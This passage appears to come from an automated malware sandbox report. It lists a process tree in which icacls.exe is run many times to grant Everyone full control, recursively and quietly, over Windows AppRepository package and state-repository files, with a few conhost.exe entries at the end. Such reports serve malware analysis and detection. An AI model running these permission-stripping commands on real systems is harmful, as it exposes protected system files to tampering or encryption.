    PID:376
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5748
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6088
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4404
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3128
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4712
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6844
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3116
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4748
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4764
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_2016.511.9510.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6280
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6468
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6008
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4212
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5688
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2536
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7100
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4664
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4296
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4208
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4128
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6260
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4992
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6612
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5388
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies data under HKEY_USERS
    PID:6736
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6596
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2204
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3564
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6780
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4052
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3772
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2972
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:1248
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4544
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6700
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4276
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3132
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7036
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5148
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3684
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6688
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6544
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6988
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5428
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6292
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4832
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6412
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5700
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2500
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5156
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2180
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm /grant Everyone:F /T /C /Q
    3⤵
    PID:4184
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal /grant Everyone:F /T /C /Q
    3⤵
    PID:5492
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd /grant Everyone:F /T /C /Q
    3⤵
    PID:4376
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm /grant Everyone:F /T /C /Q
    3⤵
    PID:6668
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal /grant Everyone:F /T /C /Q
    3⤵
    PID:5164
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:944
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3124
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3396
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6120
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:6796
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    PID:7156
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:6360
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6608
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5452
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    PID:5592
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:2768
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:2176
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:6596
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:4104
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5152
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    PID:4572
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:4328
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:3772
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:4016
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5316
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:2844
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:212
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4136
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6268
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:4884
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4188
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6164
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:6408
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:6976
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6932
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:4560
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:6108
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    PID:740
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:4148
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4608
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5856
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:4960
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6744
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4428
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5552
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:4340
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5136
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5164
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6652
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:3464
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5688
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:4672
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6388
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:4664
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:4312
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:4492
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:6848

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5480

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5296

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5440

C:\Windows\System32\Conhost.exe
